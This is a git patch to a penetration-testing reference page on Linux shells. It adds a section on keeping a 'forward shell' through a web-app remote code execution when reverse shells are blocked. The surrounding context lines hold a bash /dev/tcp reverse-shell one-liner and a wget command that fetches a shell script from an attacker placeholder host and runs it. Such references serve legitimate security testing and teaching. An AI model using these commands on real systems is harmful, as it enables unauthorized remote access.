From 9008bae6b35ffd592f0cf1c269922992da444d7a Mon Sep 17 00:00:00 2001
From: CPol <carlospolop@gmail.com>
Date: Wed, 9 Feb 2022 20:23:12 +0000
Subject: [PATCH] GitBook: [#3002] No subject

---
 shells/shells/linux.md | 13 +++++++++++++
 1 file changed, 13 insertions(+)

diff --git a/shells/shells/linux.md b/shells/shells/linux.md
index 2a0ffb0bc..1e1e89dbf 100644
--- a/shells/shells/linux.md
+++ b/shells/shells/linux.md
@@ -40,6 +40,19 @@ echo -e '#!/bin/bash\nbash -i >& /dev/tcp/1<ATTACKER-IP>/<PORT> 0>&1' > /tmp/sh.
 wget http://<IP attacker>/shell.sh -P /tmp; chmod +x /tmp/shell.sh; /tmp/shell.sh
 ```
 
+## Forward Shell
+
+You might find cases where you have a **RCE in a web app in a, Linux machine** but due to Iptables rules or other kind of filtering **you cannot get a reverse shell**. This "shell" allows you to maintain a PTY shell through that RCE using pipes inside the victim system.\
+You can find the code in [**https://github.com/IppSec/forward-shell**](https://github.com/IppSec/forward-shell)****
+
+You just need to modify:
+
+* The URL of the vulnerable host
+* The prefix and suffix of your payload (if any)
+* The way the payload is sent (headers? data? extra info?)
+
+Then, you can just **send commands** or even **use the `upgrade` command** to get a full PTY (note that pipes are read and written with an approximate 1.3s delay).
+
 ## Netcat
 
 ```bash